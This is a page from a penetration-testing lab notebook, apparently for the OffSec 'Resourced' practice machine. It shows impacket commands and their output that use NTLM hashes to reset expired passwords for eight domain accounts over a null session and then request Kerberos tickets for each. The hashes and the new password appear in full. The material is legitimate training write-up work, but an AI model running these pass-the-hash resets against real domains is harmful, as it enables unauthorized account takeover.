Password Reset

There are a lot of users returned with the STATUS_PASSWORD_EXPIRED error

Since the provided hashes were correct, password reset is possible There’s been an update. smbpasswd.py is merged into changepasswd.py

`m.mason` User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-changepasswd RESOURCED.LOCAL/m.mason@ResourceDC.resourced.local -no-pass -hashes :3105e0f6af52aba8e11d19f27e487e45 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
New password: Qwer1234
Retype new password: Qwer1234
[*] Changing the password of RESOURCED.LOCAL\m.mason
[*] Connecting to DCE/RPC as RESOURCED.LOCAL\m.mason
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getTGT RESOURCED.LOCAL/m.mason@ResourceDC.resourced.local -dc-ip $IP    
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in m.mason@ResourceDC.resourced.local.ccache

Changed & validated TGT generated for the m.mason user

`k.keen` User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-changepasswd RESOURCED.LOCAL/k.keen@ResourceDC.resourced.local -no-pass -hashes :204410cc5a7147cd52a04ddae6754b0c -newpass Qwer1234 -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Changing the password of RESOURCED.LOCAL\k.keen
[*] Connecting to DCE/RPC as RESOURCED.LOCAL\k.keen
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-getTGT RESOURCED.LOCAL/k.keen@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in k.keen@ResourceDC.resourced.local.ccache

Changed & validated TGT generated for the k.keen user

`j.johnson` User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-changepasswd RESOURCED.LOCAL/j.johnson@ResourceDC.resourced.local -no-pass -hashes :3e028552b946cc4f282b72879f63b726 -newpass Qwer1234 -dc-ip $IP ; impacket-getTGT RESOURCED.LOCAL/j.johnson@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Changing the password of RESOURCED.LOCAL\j.johnson
[*] Connecting to DCE/RPC as RESOURCED.LOCAL\j.johnson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in j.johnson@ResourceDC.resourced.local.ccache

Changed & validated TGT generated for the j.johnson user

`s.swanson` User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-changepasswd RESOURCED.LOCAL/s.swanson@ResourceDC.resourced.local -no-pass -hashes :bd7c11a9021d2708eda561984f3c8939 -newpass Qwer1234 -dc-ip $IP ; impacket-getTGT RESOURCED.LOCAL/s.swanson@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Changing the password of RESOURCED.LOCAL\s.swanson
[*] Connecting to DCE/RPC as RESOURCED.LOCAL\s.swanson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in s.swanson@ResourceDC.resourced.local.ccache

Changed & validated TGT generated for the s.swanson user

`p.parker` User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-changepasswd RESOURCED.LOCAL/p.parker@ResourceDC.resourced.local -no-pass -hashes :980910b8fc2e4fe9d482123301dd19fe -newpass Qwer1234 -dc-ip $IP ; impacket-getTGT RESOURCED.LOCAL/p.parker@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Changing the password of RESOURCED.LOCAL\p.parker
[*] Connecting to DCE/RPC as RESOURCED.LOCAL\p.parker
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in p.parker@ResourceDC.resourced.local.ccache

Changed & validated TGT generated for the p.parker user

`r.robinson` User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-changepasswd RESOURCED.LOCAL/r.robinson@ResourceDC.resourced.local -no-pass -hashes :fea5a148c14cf51590456b2102b29fac -newpass Qwer1234 -dc-ip $IP ; impacket-getTGT RESOURCED.LOCAL/r.robinson@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Changing the password of RESOURCED.LOCAL\r.robinson
[*] Connecting to DCE/RPC as RESOURCED.LOCAL\r.robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in r.robinson@ResourceDC.resourced.local.ccache

Changed & validated TGT generated for the r.robinson user

`d.durant` User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-changepasswd RESOURCED.LOCAL/d.durant@ResourceDC.resourced.local -no-pass -hashes :08aca8ed17a9eec9fac4acdcb4652c35 -newpass Qwer1234 -dc-ip $IP ; impacket-getTGT RESOURCED.LOCAL/d.durant@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Changing the password of RESOURCED.LOCAL\d.durant
[*] Connecting to DCE/RPC as RESOURCED.LOCAL\d.durant
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in d.durant@ResourceDC.resourced.local.ccache

Changed & validated TGT generated for the d.durant user

`g.goldberg` User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/resourced]
└─$ impacket-changepasswd RESOURCED.LOCAL/g.goldberg@ResourceDC.resourced.local -no-pass -hashes :62e16d17c3015c47b4d513e65ca757a2 -newpass Qwer1234 -dc-ip $IP ; impacket-getTGT RESOURCED.LOCAL/g.goldberg@ResourceDC.resourced.local -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Changing the password of RESOURCED.LOCAL\g.goldberg
[*] Connecting to DCE/RPC as RESOURCED.LOCAL\g.goldberg
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in g.goldberg@ResourceDC.resourced.local.ccache

Changed & validated TGT generated for the g.goldberg user

InfoSec LAB

Explorer

Resourced_Password_Reset

Password Reset

`m.mason` User

`k.keen` User

`j.johnson` User

`s.swanson` User

`p.parker` User

`r.robinson` User

`d.durant` User

`g.goldberg` User

Interactive Graph View

Table of Contents

Backlinks

InfoSec LAB

Explorer

Resourced_Password_Reset

Password Reset

m.mason User

k.keen User

j.johnson User

s.swanson User

p.parker User

r.robinson User

d.durant User

g.goldberg User

Interactive Graph View

Table of Contents

Backlinks

`m.mason` User

`k.keen` User

`j.johnson` User

`s.swanson` User

`p.parker` User

`r.robinson` User

`d.durant` User

`g.goldberg` User